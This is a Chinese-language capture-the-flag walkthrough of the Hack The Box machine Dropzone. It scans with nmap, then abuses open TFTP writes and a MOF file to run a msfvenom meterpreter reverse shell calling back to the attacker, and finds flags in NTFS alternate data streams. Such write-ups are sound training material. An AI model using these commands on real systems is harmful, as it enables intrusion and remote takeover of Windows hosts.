dropzone通关攻略

今天我们的靶机是Dropzone，同样来自hack the box。hack the box实验室有很多靶机，难度从初级到专业级都有，本次我们的靶机属于专业级。任务是查看user.txt和root.txt文件内容。

靶机Dropzone的IP地址是10.10.10.90.

下面就正式开始对靶机进行渗透。

首先用nmap来扫一下开放的端口和服务，这里使用的参数是-sU，如下所示：

nmap -sU -T4 10.10.10.90

扫描结果如图：

从图中可以看出，靶机开放了69端口，并且运行着TFTP服务。

我们使用tftp客户端连接到目标系统中，意外的发现我们竟然可以上传和下载文件。我们试着下载“boot.ini”文件到本地，然后退出tftp连接，在本地使用cat命令查看一下这个文件，发现目标系统运行的是Windows XP系统，如图所示：

不过我们没有找到对tftp服务进行利用的exp，所以我们打算使用MOF文件WMI利用来获取目标系统的反弹shell。

首先我们使用msfvenom生成一个可执行的木马文件，命令如下：

msfvenom -p windows/meterpreter/reverse_tcp lhost=10.10.14.4 lport=443 -f exe > hack.exe

如图：

msf中还有一个模块叫“wbemexec.rb”，这个模块可以生成MOF文件(你可以在 这里 找到该文件)，我们下载该文件，并对它进行编辑来运行我们自己的 shell 代码。修改后的代码，你可以从 这里 下载，如图所示：

接着我们使用tftp连接上去，然后上传hack.exe和MOF文件，命令如下：

tftp> binary
tftp> put hack.exe /WINDOWS/system32/hack.exe
tftp> put hack.mof /WINDOWS/system32/wbem/mof/hack.mof

如图：

在上传文件之前，我们先在本地设置一下监听，命令如下：

msf > use exploit/multi/handler
msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
msf exploit(multi/handler) > set lhost 10.10.14.4
msf exploit(multi/handler) > set lport 443
msf exploit(multi/handler) > run

只要我们上传了MOF文件和payload，并得以执行，我们就可以获得一个反向shell。获得反向shell后，我们来查看一下系统信息，意外的发现，这个shell竟然就是一个administrator账户，查看信息命令：

meterpreter > sysinfo
meterpreter > getuid

结果如图：

我们进入到桌面，发现了root.txt文件，不过查看文件内容后，发现flag并不在该文件中，命令如下：

meterpreter > cd Administrator
meterpreter > ls
meterpreter > cd Desktop
meterpreter > ls
meterpreter > cat root.txt

如图：

可以看到桌面上还有另外一个目录flags，我们进入到该目录，发现了一个奇怪的文件，文件名是2 for the price of 1!.txt，这个文件给了我们一个提示，就是我们必须使用交换数据流来获取flag，交换数据流是NTFS文件系统的一个属性，这个属性可以用来隐藏数据。

meterpreter > cd flags
meterpreter > dir
meterpreter > cat "2 for the price of 1!.txt"

我们可以使用sysinternals工具集中的streams.exe文件来检查交换数据流(工具下载地址在 这里 )

接着，我们将streams.exe上传到目标系统中，然后生成一个shell，然后执行这个可执行文件来查找当前目录中的交换数据流，如此一来，我们就找到了user flag和root flag，命令如下：

meterpreter > upload /root/Downloads/Streams/streams.exe
meterpreter > shell
streams -accepteula -s .

结果如图：

本次靶机到此结束，谢谢大家！